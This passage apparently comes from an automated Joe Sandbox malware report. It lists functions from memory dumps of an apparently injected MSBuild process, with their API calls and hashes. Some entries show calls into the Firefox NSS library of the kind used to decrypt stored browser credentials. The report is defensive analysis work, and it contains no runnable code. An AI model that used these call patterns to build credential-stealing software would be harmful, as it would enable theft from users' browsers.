                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 6b9bd58a76f6015017861676f4f1b4d3ec2be9568ed5fca8a091e83d2bed6ce3
                                                                                        • Instruction ID: 25d565d5ee4a4702b91c68662a662a7ad42dfcb8a2de35b795cdf97fb66203ee
                                                                                        • Opcode Fuzzy Hash: 6b9bd58a76f6015017861676f4f1b4d3ec2be9568ed5fca8a091e83d2bed6ce3
                                                                                        • Instruction Fuzzy Hash: 9321B4717407105BC334CBB9CC81BA7B7EAEBC0714F14453EEA5ADB3D0D679A8408648
                                                                                        Function 00406840 Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: aa3697299414a2ef3454fad5190ea0879d599e7ac252b065ebb4e6ffadd190e6
                                                                                        • Instruction ID: 029a4059ce785aea66ee81bb854fb7a0a454fc3853df5ecaeac7f0707622af9f
                                                                                        • Opcode Fuzzy Hash: aa3697299414a2ef3454fad5190ea0879d599e7ac252b065ebb4e6ffadd190e6
                                                                                        • Instruction Fuzzy Hash: ED417FB1A002099FDB24DF99D940AAFF7B9AF44314F11407AEC0AA7381E734DD50CB95
                                                                                        Function 00406780 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualProtect.KERNEL32(?,?,00000040,004068D6,?,?,?,?,004068D6,?,?,?,?,00000000), ref: 004067F5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: 99b66b60656c25ca60d6866d83d157977516d1859eacdc4d2eb808762aa41453
                                                                                        • Instruction ID: 01cb8937eeb0f68714991e8ebc060aa972990f473894c37eb69bfcd2b7a4d248
                                                                                        • Opcode Fuzzy Hash: 99b66b60656c25ca60d6866d83d157977516d1859eacdc4d2eb808762aa41453
                                                                                        • Instruction Fuzzy Hash: 1E110C716041199BD724DF5CD8807A6F3E9FB08308F21493BE54BD7780D23DAC618799
                                                                                        Function 00410D50 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SHGetFolderPathA.SHELL32(00000000,004201E9,00000000,00000000,?,00000000,?), ref: 00410D81
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FolderPathlstrcpy
                                                                                        • String ID:
                                                                                        • API String ID: 1699248803-0
                                                                                        • Opcode ID: 9ff86aa52045c1a75e82c3a22932520cd9600684b4e6ca602800722b1fa87dd6
                                                                                        • Instruction ID: bf07e7dc27ca486ce73a822693bad4f66ee15eaaa84330aa2caf21beff2e0ca4
                                                                                        • Opcode Fuzzy Hash: 9ff86aa52045c1a75e82c3a22932520cd9600684b4e6ca602800722b1fa87dd6
                                                                                        • Instruction Fuzzy Hash: C2F0A032A1015CABDB10DA58DC51B9DB3FCDB84701F1082A6BA08E32C0DA706F068B94
                                                                                        Function 00410D10 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNEL32(00000000,?,?,0040B844,?,00000000,?,00000000,004201E9,004201E9), ref: 00410D1D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 211951a67623cc10f1816536ae82aa56ec50d4b76de61764da72f65eecc1376d
                                                                                        • Instruction ID: fb15c47bbe0b93a4405a7b8ff06cc38f93f54865058fbad0eae59745ca59ce08
                                                                                        • Opcode Fuzzy Hash: 211951a67623cc10f1816536ae82aa56ec50d4b76de61764da72f65eecc1376d
                                                                                        • Instruction Fuzzy Hash: 92E0867260012817CB10BAE9E8015DA7758DF407B5B44453AF90DEA5D1DB38AEC587C8

                                                                                        Non-executed Functions

                                                                                        Function 6C6CA650 Relevance: 31.8, APIs: 21, Instructions: 278memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C6CA670
                                                                                          • Part of subcall function 6C6E0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6887ED,00000800,6C67EF74,00000000), ref: 6C6E1000
                                                                                          • Part of subcall function 6C6E0FF0: PR_NewLock.NSS3(?,00000800,6C67EF74,00000000), ref: 6C6E1016
                                                                                          • Part of subcall function 6C6E0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6887ED,00000008,?,00000800,6C67EF74,00000000), ref: 6C6E102B
                                                                                        • PK11_GetInternalKeySlot.NSS3 ref: 6C6CA67E
                                                                                        • PK11_Authenticate.NSS3(00000000,00000001,?), ref: 6C6CA69B
                                                                                          • Part of subcall function 6C6A9520: PK11_IsLoggedIn.NSS3(00000000,?,6C6D379E,?,00000001,?), ref: 6C6A9542
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6CA6C0
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6CA703
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6CA718
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6CA78B
                                                                                        • PK11_CreateContextBySymKey.NSS3(00000133,00000104,?,00000000), ref: 6C6CA7DD
                                                                                        • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C6CA7FA
                                                                                        • PORT_Alloc_Util.NSS3(00000000), ref: 6C6CA818
                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C6CA82F
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6CA868
                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C6CA873
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6CA884
                                                                                        • PK11_FreeSymKey.NSS3(00000000), ref: 6C6CA894
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C6CA8D9
                                                                                        • PK11_CipherOp.NSS3(?,00000000,?,00000000,00000000,00000000), ref: 6C6CA8F0
                                                                                        • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C7E0B04), ref: 6C6CA93F
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6CA952
                                                                                        • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C6CA961
                                                                                        • PK11_DestroyContext.NSS3(?,00000001), ref: 6C6CA96E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$K11_$Item_$Zfree$Arena_Free$Alloc_ArenaContext$AuthenticateBlockCipherCreateCriticalDestroyEncodeEnterInitInternalLockLoggedPoolSectionSizeSlotUnlockValuecallocmemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 1441238854-0
                                                                                        • Opcode ID: 0f2662c7b12fa2bf32e21f202bb3f3a45f5092dd6b356803e48c5aa4c4215bb1
                                                                                        • Instruction ID: d94a2012fa58f586d94f4fab89c7f68d28544a86791cf5df6a6ac90a5b9bd11c
                                                                                        • Opcode Fuzzy Hash: 0f2662c7b12fa2bf32e21f202bb3f3a45f5092dd6b356803e48c5aa4c4215bb1
                                                                                        • Instruction Fuzzy Hash: EF91E7B1E012089FEB00DFA4DC45AAE77B8EF15308F144525E815AB742F771991ACBAA
                                                                                        Function 6C6B0570 Relevance: 22.8, APIs: 15, Instructions: 256memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PK11_HPKE_Deserialize.NSS3(?,?,?,00000000), ref: 6C6B05E3
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6B060C
                                                                                        • PK11_HPKE_DestroyContext.NSS3(?,00000000), ref: 6C6B061A
                                                                                        • PK11_PubDeriveWithKDF.NSS3 ref: 6C6B0712
                                                                                        • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C6B0740
                                                                                        • memcpy.VCRUNTIME140(?,00000006,?), ref: 6C6B0760
                                                                                        • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C6B07AE
                                                                                        • PK11_FreeSymKey.NSS3(?), ref: 6C6B07BC
                                                                                        • PK11_FreeSymKey.NSS3(?), ref: 6C6B07D1
                                                                                        • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C6B07DD
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6B07EB
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000001,00000001), ref: 6C6B07F8
                                                                                        • PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6C6B082F
                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C6B08A9
                                                                                        • SECITEM_DupItem_Util.NSS3(?), ref: 6C6B08D0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: K11_$Item_Util$ContextDestroyErrorFreeZfreememcpy$AllocCreateDeriveDeserializePublicWith
                                                                                        • String ID:
                                                                                        • API String ID: 657680294-0
                                                                                        • Opcode ID: b3f99e85071e2a86499945143bc8fe383ca3b920e67e2bb30c08ca067c9caab5
                                                                                        • Instruction ID: b25f5207db29c9726e11d8f669a6a177dcf46a6bad597f7f21571e6b80ed3a2c
                                                                                        • Opcode Fuzzy Hash: b3f99e85071e2a86499945143bc8fe383ca3b920e67e2bb30c08ca067c9caab5
                                                                                        • Instruction Fuzzy Hash: 9D91C4B1A083419FE700CF25DA44B5BBBE1EF84318F14852CE99997751FB31D964CB8A
                                                                                        Function 6C6D6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C681C6F,00000000,00000004,?,?), ref: 6C6D6C3F
                                                                                          • Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C681C6F,00000000,00000004,?,?), ref: 6C6D6C60
                                                                                        • PR_ExplodeTime.NSS3(00000000,6C681C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C681C6F,00000000,00000004,?,?), ref: 6C6D6C94
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                        • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                        • API String ID: 3534712800-180463219
                                                                                        • Opcode ID: 2537412f649d1b5b12c26790da163225c6b3f25994265ecaa62f5ccc710f12fa
                                                                                        • Instruction ID: 636e7b41d99490de196757aab33155310178815fc3b4ea942e8e096422151b56
                                                                                        • Opcode Fuzzy Hash: 2537412f649d1b5b12c26790da163225c6b3f25994265ecaa62f5ccc710f12fa
                                                                                        • Instruction Fuzzy Hash: E4516B72B016494FC70CCDADDC526DEB7DAABA4310F48C23AE442DB781DA38E906C751
                                                                                        Function 6C798D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_CallOnce.NSS3(6C7E14E4,6C74CC70), ref: 6C798D47
                                                                                        • PR_GetCurrentThread.NSS3 ref: 6C798D98
                                                                                          • Part of subcall function 6C670F00: PR_GetPageSize.NSS3(6C670936,FFFFE8AE,?,6C6016B7,00000000,?,6C670936,00000000,?,6C60204A), ref: 6C670F1B
                                                                                          • Part of subcall function 6C670F00: PR_NewLogModule.NSS3(clock,6C670936,FFFFE8AE,?,6C6016B7,00000000,?,6C670936,00000000,?,6C60204A), ref: 6C670F25
                                                                                        • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C798E7B
                                                                                        • htons.WSOCK32(?), ref: 6C798EDB
                                                                                        • PR_GetCurrentThread.NSS3 ref: 6C798F99
                                                                                        • PR_GetCurrentThread.NSS3 ref: 6C79910A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                        • String ID: %u.%u.%u.%u
                                                                                        • API String ID: 1845059423-1542503432
                                                                                        • Opcode ID: d9833fadbfb4275e1c45426401f553e34ac7221002bdcf5772c4fd80250f6e1a
                                                                                        • Instruction ID: d5c9680b10ace95c6b8c0a62a9017d08c49428d7ae59c2576b6b5a7047adb388
                                                                                        • Opcode Fuzzy Hash: d9833fadbfb4275e1c45426401f553e34ac7221002bdcf5772c4fd80250f6e1a
                                                                                        • Instruction Fuzzy Hash: 2002DC319452518FEB18CF19C6687AABBB3EF52344F29C26EC8964FB92C331D905C390
                                                                                        Function 6C73A480 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 235COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C75C3A2,?,?,00000000,00000000), ref: 6C73A528
                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C73A6E0
                                                                                        • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C73A71B
                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C73A738
                                                                                        Strings
                                                                                        • %s at line %d of [%.10s], xrefs: 6C73A6D9
                                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C73A6CA
                                                                                        • database corruption, xrefs: 6C73A6D4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: _byteswap_ushort$_byteswap_ulongsqlite3_log
                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                        • API String ID: 622669576-598938438
                                                                                        • Opcode ID: 998683307bdc4654ae3972a90dae3a159ae9d954ec64f3c2391d48719473f9cf
                                                                                        • Instruction ID: d888b5200fc2a96d206570c1131afe0cfbd335db7a4a3661d0f0fa6ea04263d6
                                                                                        • Opcode Fuzzy Hash: 998683307bdc4654ae3972a90dae3a159ae9d954ec64f3c2391d48719473f9cf
                                                                                        • Instruction Fuzzy Hash: 0E91F7717083218FCB04CF68C585A5AB7E1BF58324F045A6DE89ACBB92E730EC44C792
                                                                                        Function 6C714540 Relevance: 12.2, APIs: 8, Instructions: 170COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32 ref: 6C714571
                                                                                        • memset.VCRUNTIME140(?,00000000,00000000), ref: 6C7145B1
                                                                                        • memcpy.VCRUNTIME140(?,?,00000020), ref: 6C7145C2
                                                                                          • Part of subcall function 6C7104C0: WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6C71461B,-00000004), ref: 6C7104DF
                                                                                          • Part of subcall function 6C7104C0: PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6C71461B,-00000004), ref: 6C710534
                                                                                        • PR_Now.NSS3 ref: 6C714626
                                                                                          • Part of subcall function 6C749DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C790A27), ref: 6C749DC6
                                                                                          • Part of subcall function 6C749DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C790A27), ref: 6C749DD1
                                                                                          • Part of subcall function 6C749DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C749DED
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C714634
                                                                                        • memcmp.VCRUNTIME140(?,?,?,00000000,?,000F4240,00000000), ref: 6C7146C4
                                                                                        • PR_SetError.NSS3(FFFFD05A,00000000,00000000,?,000F4240,00000000), ref: 6C7146E3
                                                                                        • PR_SetError.NSS3(?,00000000), ref: 6C714722
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorTime$SystemUnothrow_t@std@@@__ehfuncinfo$??2@$FileObjectSingleValueWaitmemcmpmemcpymemset
                                                                                        • String ID:
                                                                                        • API String ID: 1183590942-0
                                                                                        • Opcode ID: caff30995b82781650489b18a899ca78fa0c76d71cf67f071d7bcdb5c64f16ae
                                                                                        • Instruction ID: 5848dce2a595252036f5b1c32662e8d06a17aa3afd3d0c2da11392af8aa8c185
                                                                                        • Opcode Fuzzy Hash: caff30995b82781650489b18a899ca78fa0c76d71cf67f071d7bcdb5c64f16ae
                                                                                        • Instruction Fuzzy Hash: C961E2B1E046049FEB10CF28D988B9AB7F5FF59308F584538E8459BA51E730F904CB80
                                                                                        Function 6C694420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6C694444
                                                                                        • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C694466
                                                                                          • Part of subcall function 6C6E1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C6888A4,00000000,00000000), ref: 6C6E1228
